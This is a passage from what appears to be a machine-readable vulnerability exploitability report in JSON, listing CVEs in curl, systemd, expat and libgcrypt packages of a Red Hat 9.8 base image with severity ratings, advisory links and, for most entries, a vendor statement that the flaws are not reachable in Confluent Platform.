          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3784"
        }
      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-06-17T10:44:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4105",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        284
      ],
      "description": "A flaw was found in systemd. The systemd-machined service contains an Improper Access Control vulnerability due to insufficient validation of the class parameter in the RegisterMachine D-Bus (Desktop Bus) method. A local unprivileged user can exploit this by attempting to register a machine with a specific class value, which may leave behind a usable, attacker-controlled machine object. This allows the attacker to invoke methods on the privileged object, leading to the execution of arbitrary commands with root privileges on the host system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4105"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7299"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4105"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447262"
        },
        {
          "url": "https://github.com/systemd/systemd/security/advisories/GHSA-4h6x-r8vx-3862"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4105"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4105"
        }
      ],
      "published": "2026-03-13T19:55:13+00:00",
      "updated": "2026-06-17T10:55:59+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "252-67.el9_8.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "252-67.el9_8.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "252-67.el9_8.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "252-67.el9_8.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41080",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        331
      ],
      "description": "libexpat before 2.8.0 uses insufficient entropy, and thus hash flooding can occur via a crafted XML document.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41080"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/26/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41080"
        },
        {
          "url": "https://blog.hartwork.org/posts/expat-2-8-0-released/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/47"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1183"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41080"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41080"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/26/1"
        }
      ],
      "published": "2026-04-16T17:16:54+00:00",
      "updated": "2026-07-14T13:18:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41989",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Libgcrypt before 1.12.2 sometimes allows a heap-based buffer overflow and denial of service via crafted ECDH ciphertext to gcry_pk_decrypt.",
      "recommendation": "Upgrade libgcrypt to version 1.10.0-13.el9_8",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41989"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47117"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50147"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41989"
        },
        {
          "url": "https://bugzilla.redhat.com/2461063"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461063"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-019113.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
